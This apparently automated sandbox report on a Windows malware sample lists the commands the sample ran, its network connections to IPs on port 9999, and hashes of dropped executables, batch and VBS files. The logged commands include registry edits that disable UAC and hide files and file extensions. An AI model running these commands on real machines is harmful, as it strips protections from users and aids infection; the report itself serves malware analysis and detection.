reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JCYIMYYQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vuYAgscU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qgMcUgAo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UmIEwEQo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

Network

Country Destination Domain Proto
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 8.8.8.8:53 settings-win.data.microsoft.com udp
US 52.167.17.97:443 settings-win.data.microsoft.com tcp
BO 200.87.164.69:9999 tcp
BO 200.87.164.69:9999 tcp
US 8.8.8.8:53 google.com udp
NL 142.251.36.46:80 google.com tcp
NL 142.251.36.46:80 google.com tcp
US 8.8.8.8:53 settings-win.data.microsoft.com udp
US 52.167.17.97:443 settings-win.data.microsoft.com tcp
BO 200.119.204.12:9999 tcp
BO 200.119.204.12:9999 tcp
US 8.8.8.8:53 settings-win.data.microsoft.com udp
US 52.167.17.97:443 settings-win.data.microsoft.com tcp
US 52.167.17.97:443 settings-win.data.microsoft.com tcp
US 52.167.17.97:443 settings-win.data.microsoft.com tcp
BO 190.186.45.170:9999 tcp
BO 190.186.45.170:9999 tcp

Files

C:\Users\Admin\fSgEsIQI\dAkcYIYg.exe

MD5 55cf088a32a74f851db9ad823d84252a
SHA1 1e1bc9e589a9f414e07dd6fd0e370a64e34b6eb3
SHA256 ad5dc9996e438f7152e6dd19737d52c516cc389eaad8dff06c3d2ce5f59f6e9e
SHA512 f060ac9c700a2d541072b22a0134ce21374368656fa549c816a0f8a4798573cf17fd2e7b04e72ef766b8f5729522c1806a90d2e248bfe15d46a91813599ffcc6

C:\Users\Admin\fSgEsIQI\dAkcYIYg.exe

MD5 55cf088a32a74f851db9ad823d84252a
SHA1 1e1bc9e589a9f414e07dd6fd0e370a64e34b6eb3
SHA256 ad5dc9996e438f7152e6dd19737d52c516cc389eaad8dff06c3d2ce5f59f6e9e
SHA512 f060ac9c700a2d541072b22a0134ce21374368656fa549c816a0f8a4798573cf17fd2e7b04e72ef766b8f5729522c1806a90d2e248bfe15d46a91813599ffcc6

C:\ProgramData\WwgMQcMw\LyocAoAM.exe

MD5 9df4048ad1ac758b5aedb1654c6fb76d
SHA1 73db2126223617b97bd6515d57e1cf4103171290
SHA256 80f3a259c54d16e7a71cee3ee21b853d89424f3321802f3976b24d264f1a2cb5
SHA512 944ce4e6754d75fbb13355223730ac42f81ea87148d7524ff769de108bf7acc2fbb47754d234f8a5cad3e6a23499d093fd685b9ce9941770c8af207d58d3ea76

C:\ProgramData\WwgMQcMw\LyocAoAM.exe

MD5 9df4048ad1ac758b5aedb1654c6fb76d
SHA1 73db2126223617b97bd6515d57e1cf4103171290
SHA256 80f3a259c54d16e7a71cee3ee21b853d89424f3321802f3976b24d264f1a2cb5
SHA512 944ce4e6754d75fbb13355223730ac42f81ea87148d7524ff769de108bf7acc2fbb47754d234f8a5cad3e6a23499d093fd685b9ce9941770c8af207d58d3ea76

C:\Users\Admin\AppData\Local\Temp\eewUwIAg.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

memory/2644-135-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/1656-138-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\KmEMMMck.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

memory/1252-142-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\oiUcsAoE.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/4044-146-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

C:\Users\Admin\AppData\Local\Temp\buskYcUk.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

memory/4956-150-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\zMEQogAA.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

memory/1868-154-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bcQoEgII.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

memory/1176-158-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

C:\Users\Admin\AppData\Local\Temp\ncIgIoUw.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

memory/4892-161-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\HaIYwMoI.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/1968-166-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\VSYAEMQM.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

memory/3876-170-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pooUoUQI.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/4560-174-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\QCgIAsYA.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

memory/3532-178-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\KwcAQkMA.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

memory/3932-182-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\KYEkMowQ.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/4524-187-0x0000000000400000-0x000000000043D000-memory.dmp

C:\ProgramData\WwgMQcMw\LyocAoAM.inf

MD5 93053928dbf8eb95edecc545df9fb725
SHA1 4b6d0bd54e7d2cf1c9513878e64526c10178b2e2
SHA256 5191da0608d4599c5197c33412f6d8e4cbada58cf5e8288fd2044356073b5ad3
SHA512 c2318e46b1f3f20668b4bb097371be55cc67f5d622dad037cf5cc3a9c0ad5002d3f05d3f36d1eb25af712bec9585a30eea9e8e6fcb6d49d965585fcabc0b5c29

C:\Users\Admin\AppData\Local\Temp\WuIYEEIY.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/4700-191-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\fSgEsIQI\dAkcYIYg.inf

MD5 93053928dbf8eb95edecc545df9fb725
SHA1 4b6d0bd54e7d2cf1c9513878e64526c10178b2e2
SHA256 5191da0608d4599c5197c33412f6d8e4cbada58cf5e8288fd2044356073b5ad3
SHA512 c2318e46b1f3f20668b4bb097371be55cc67f5d622dad037cf5cc3a9c0ad5002d3f05d3f36d1eb25af712bec9585a30eea9e8e6fcb6d49d965585fcabc0b5c29

C:\Users\Admin\AppData\Local\Temp\OQUEQUwg.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

memory/3508-196-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AsIMYIoI.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
